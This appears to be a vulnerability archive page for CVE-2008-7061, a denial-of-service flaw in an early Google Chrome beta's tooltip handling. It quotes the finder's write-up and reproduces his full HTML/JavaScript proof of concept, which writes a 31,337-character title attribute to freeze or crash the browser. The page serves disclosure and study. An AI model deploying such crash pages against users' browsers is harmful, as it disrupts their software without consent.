Overview:
The tooltip manager (chrome/views/tooltip_manager.cc) in Google Chrome 0.2.149.29 Build 1798 and possibly other versions before 0.2.149.30 allows remote attackers to cause a denial of service (CPU consumption or crash) via a tag with a long title attribute, which is not properly handled when displaying a tooltip, a different vulnerability than CVE-2008-6994.
Source: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7061
Here is the original exploit description by Exodus:
Google’s has lunched their new browser called Chrome in its very early BETA version(0.2.149.27)
and ofcourse everyone is on the race for 0day exploits. So far only few vulnerability has been found most of them are low severity exploits and non of them are a real use for massive 0wnage or somthing
so i thought i’ll give it a try and so far i’ve came up with another kinda useless exploit
i’ve found that Chrome is having a hard time rendering a oversized title attribute causing it to
– freeze under Vista SP1.
– crash in some cases under Windows XP SP1/SP2.
Exploit:
<!–
Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit
Exploit written by Exodus.
http://www.blackhat.org.il
http://www.blackhat.org.il/index.php/ready-set-chrome/
http://www.blackhat.org.il/exploits/chrome-freeze-exploit.html
–>
<HTML>
<HEAD>
<TITLE> Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit</TITLE>
<SCRIPT language="JavaScript">
function buff(len)
{
var buffer;
for(var i = 0; i != len; i++)
{ buffer += 'E';}
return buffer;
}
</SCRIPT>
</HEAD>
<SCRIPT>
document.write('<body title=\”' + buff(31337) + '\”>');
</SCRIPT>
</BODY>
</HTML>
Recent Comments